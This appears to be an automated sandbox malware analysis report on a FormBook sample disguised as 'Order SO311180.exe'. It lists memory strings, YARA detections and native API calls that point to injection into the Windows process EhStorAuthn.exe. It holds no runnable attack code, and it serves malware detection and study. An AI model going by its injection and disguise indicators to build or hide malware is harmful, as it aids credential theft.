Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: EhStorAuthn.exe, 00000007.00000003.2882271865.0000000008228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.0000000008238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Order SO311180.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62294 NtQueryInformationProcess, 0_2_06C62294
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6630B NtQueryInformationProcess, 0_2_06C6630B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0042C653 NtClose, 3_2_0042C653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2B60 NtClose,LdrInitializeThunk, 3_2_018C2B60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_018C2DF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_018C2C70
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C35C0 NtCreateMutant,LdrInitializeThunk, 3_2_018C35C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C4340 NtSetContextThread, 3_2_018C4340
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C4650 NtSuspendThread, 3_2_018C4650
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2B80 NtQueryInformationFile, 3_2_018C2B80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BA0 NtEnumerateValueKey, 3_2_018C2BA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BE0 NtQueryValueKey, 3_2_018C2BE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2BF0 NtAllocateVirtualMemory, 3_2_018C2BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AB0 NtWaitForSingleObject, 3_2_018C2AB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AD0 NtReadFile, 3_2_018C2AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2AF0 NtWriteFile, 3_2_018C2AF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DB0 NtEnumerateKey, 3_2_018C2DB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2DD0 NtDelayExecution, 3_2_018C2DD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D00 NtSetInformationFile, 3_2_018C2D00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D10 NtMapViewOfSection, 3_2_018C2D10
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D30 NtUnmapViewOfSection, 3_2_018C2D30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CA0 NtQueryInformationToken, 3_2_018C2CA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CC0 NtQueryVirtualMemory, 3_2_018C2CC0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2CF0 NtOpenProcess, 3_2_018C2CF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C00 NtQueryInformationProcess, 3_2_018C2C00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2C60 NtCreateKey, 3_2_018C2C60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F90 NtProtectVirtualMemory, 3_2_018C2F90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FA0 NtQuerySection, 3_2_018C2FA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FB0 NtResumeThread, 3_2_018C2FB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FE0 NtCreateFile, 3_2_018C2FE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F30 NtCreateSection, 3_2_018C2F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F60 NtCreateProcessEx, 3_2_018C2F60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2E80 NtReadVirtualMemory, 3_2_018C2E80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2EA0 NtAdjustPrivilegesToken, 3_2_018C2EA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2EE0 NtQueueApcThread, 3_2_018C2EE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2E30 NtWriteVirtualMemory, 3_2_018C2E30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3090 NtSetValueKey, 3_2_018C3090
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3010 NtOpenDirectoryObject, 3_2_018C3010
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C39B0 NtGetContextThread, 3_2_018C39B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3D10 NtOpenProcessToken, 3_2_018C3D10
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C3D70 NtOpenThread, 3_2_018C3D70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034650 NtSuspendThread,LdrInitializeThunk, 7_2_05034650
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034340 NtSetContextThread,LdrInitializeThunk, 7_2_05034340
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_05032D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_05032D30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DD0 NtDelayExecution,LdrInitializeThunk, 7_2_05032DD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_05032DF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C60 NtCreateKey,LdrInitializeThunk, 7_2_05032C60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_05032C70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_05032CA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F30 NtCreateSection,LdrInitializeThunk, 7_2_05032F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FB0 NtResumeThread,LdrInitializeThunk, 7_2_05032FB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FE0 NtCreateFile,LdrInitializeThunk, 7_2_05032FE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032E80 NtReadVirtualMemory,LdrInitializeThunk, 7_2_05032E80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_05032EE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032B60 NtClose,LdrInitializeThunk, 7_2_05032B60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BA0 NtEnumerateValueKey,LdrInitializeThunk, 7_2_05032BA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_05032BE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_05032BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AD0 NtReadFile,LdrInitializeThunk, 7_2_05032AD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AF0 NtWriteFile,LdrInitializeThunk, 7_2_05032AF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050335C0 NtCreateMutant,LdrInitializeThunk, 7_2_050335C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050339B0 NtGetContextThread,LdrInitializeThunk, 7_2_050339B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D00 NtSetInformationFile, 7_2_05032D00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032DB0 NtEnumerateKey, 7_2_05032DB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032C00 NtQueryInformationProcess, 7_2_05032C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CC0 NtQueryVirtualMemory, 7_2_05032CC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032CF0 NtOpenProcess, 7_2_05032CF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F60 NtCreateProcessEx, 7_2_05032F60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F90 NtProtectVirtualMemory, 7_2_05032F90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FA0 NtQuerySection, 7_2_05032FA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032E30 NtWriteVirtualMemory, 7_2_05032E30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032EA0 NtAdjustPrivilegesToken, 7_2_05032EA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032B80 NtQueryInformationFile, 7_2_05032B80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032AB0 NtWaitForSingleObject, 7_2_05032AB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033010 NtOpenDirectoryObject, 7_2_05033010
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033090 NtSetValueKey, 7_2_05033090
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033D10 NtOpenProcessToken, 7_2_05033D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05033D70 NtOpenThread, 7_2_05033D70
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8FC0 NtDeleteFile, 7_2_030C8FC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8ED0 NtReadFile, 7_2_030C8ED0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8D60 NtCreateFile, 7_2_030C8D60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C91D0 NtAllocateVirtualMemory, 7_2_030C91D0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C9060 NtClose, 7_2_030C9060
Detected potential crypto function
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAEF04 0_2_00BAEF04
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_04CC0040 0_2_04CC0040
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_04CC003F 0_2_04CC003F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C63658 0_2_06C63658
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62388 0_2_06C62388
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69D60 0_2_06C69D60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C63653 0_2_06C63653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C65720 0_2_06C65720
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C66490 0_2_06C66490
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C652E8 0_2_06C652E8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6237B 0_2_06C6237B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68E43 0_2_06C68E43
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68E48 0_2_06C68E48
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69FE3 0_2_06C69FE3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69FF0 0_2_06C69FF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C69D50 0_2_06C69D50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C65BE0 0_2_06C65BE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F6C68 0_2_0E1F6C68
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F0C68 0_2_0E1F0C68
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F2498 0_2_0E1F2498
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F0830 0_2_0E1F0830
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F2060 0_2_0E1F2060
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F3178 0_2_0E1F3178
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00418653 3_2_00418653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004168A3 3_2_004168A3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00410143 3_2_00410143
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00401100 3_2_00401100
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040E1C3 3_2_0040E1C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004029E0 3_2_004029E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00403370 3_2_00403370
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004024C0 3_2_004024C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0042ECF3 3_2_0042ECF3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004024B5 3_2_004024B5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00402690 3_2_00402690
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040FF1D 3_2_0040FF1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040FF23 3_2_0040FF23
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019441A2 3_2_019441A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019501AA 3_2_019501AA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019481CC 3_2_019481CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880100 3_2_01880100
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01918158 3_2_01918158
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019503E6 3_2_019503E6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E3F0 3_2_0189E3F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194A352 3_2_0194A352
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019102C0 3_2_019102C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01930274 3_2_01930274
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01950591 3_2_01950591
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890535 3_2_01890535
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193E4F6 3_2_0193E4F6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934420 3_2_01934420
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01942446 3_2_01942446
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188C7C0 3_2_0188C7C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4750 3_2_018B4750
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890770 3_2_01890770
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AC6E0 3_2_018AC6E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018929A0 3_2_018929A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0195A9A6 3_2_0195A9A6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018768B8 3_2_018768B8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BE8F0 3_2_018BE8F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189A840 3_2_0189A840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01892840 3_2_01892840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01946BD7 3_2_01946BD7
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194AB40 3_2_0194AB40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A8DBF 3_2_018A8DBF
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188ADE0 3_2_0188ADE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189AD00 3_2_0189AD00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192CD1F 3_2_0192CD1F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01930CB5 3_2_01930CB5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880CF2 3_2_01880CF2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890C00 3_2_01890C00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190EFA0 3_2_0190EFA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01882FC8 3_2_01882FC8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189CFE0 3_2_0189CFE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01932F30 3_2_01932F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D2F28 3_2_018D2F28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B0F30 3_2_018B0F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01904F40 3_2_01904F40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194CE93 3_2_0194CE93
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2E90 3_2_018A2E90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194EEDB 3_2_0194EEDB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194EE26 3_2_0194EE26
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890E59 3_2_01890E59
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189B1B0 3_2_0189B1B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C516C 3_2_018C516C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187F172 3_2_0187F172
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0195B16B 3_2_0195B16B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018970C0 3_2_018970C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193F0CC 3_2_0193F0CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F0E0 3_2_0194F0E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019470E9 3_2_019470E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D739A 3_2_018D739A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194132D 3_2_0194132D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187D34C 3_2_0187D34C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018952A0 3_2_018952A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AB2C0 3_2_018AB2C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019312ED 3_2_019312ED
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192D5B0 3_2_0192D5B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019595C3 3_2_019595C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947571 3_2_01947571
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F43F 3_2_0194F43F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01881460 3_2_01881460
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F7B0 3_2_0194F7B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019416CC 3_2_019416CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D5630 3_2_018D5630
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01925910 3_2_01925910
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01899950 3_2_01899950
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AB950 3_2_018AB950
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018938E0 3_2_018938E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FD800 3_2_018FD800
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AFB80 3_2_018AFB80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01905BF0 3_2_01905BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018CDBF9 3_2_018CDBF9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FB76 3_2_0194FB76
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D5AA0 3_2_018D5AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01931AA3 3_2_01931AA3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192DAAC 3_2_0192DAAC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193DAC6 3_2_0193DAC6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947A46 3_2_01947A46
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FA49 3_2_0194FA49
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01903A6C 3_2_01903A6C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AFDC0 3_2_018AFDC0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01893D40 3_2_01893D40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01941D5A 3_2_01941D5A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947D73 3_2_01947D73
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FCF2 3_2_0194FCF2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01909C32 3_2_01909C32
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01891F92 3_2_01891F92
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FFB1 3_2_0194FFB1
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01853FD5 3_2_01853FD5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01853FD2 3_2_01853FD2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FF09 3_2_0194FF09
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01899EB0 3_2_01899EB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000535 7_2_05000535
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C0591 7_2_050C0591
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A4420 7_2_050A4420
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B2446 7_2_050B2446
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050AE4F6 7_2_050AE4F6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05024750 7_2_05024750
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000770 7_2_05000770
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFC7C0 7_2_04FFC7C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501C6E0 7_2_0501C6E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509A118 7_2_0509A118
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05088158 7_2_05088158
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C01AA 7_2_050C01AA
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B41A2 7_2_050B41A2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B81CC 7_2_050B81CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05092000 7_2_05092000
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF0100 7_2_04FF0100
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BA352 7_2_050BA352
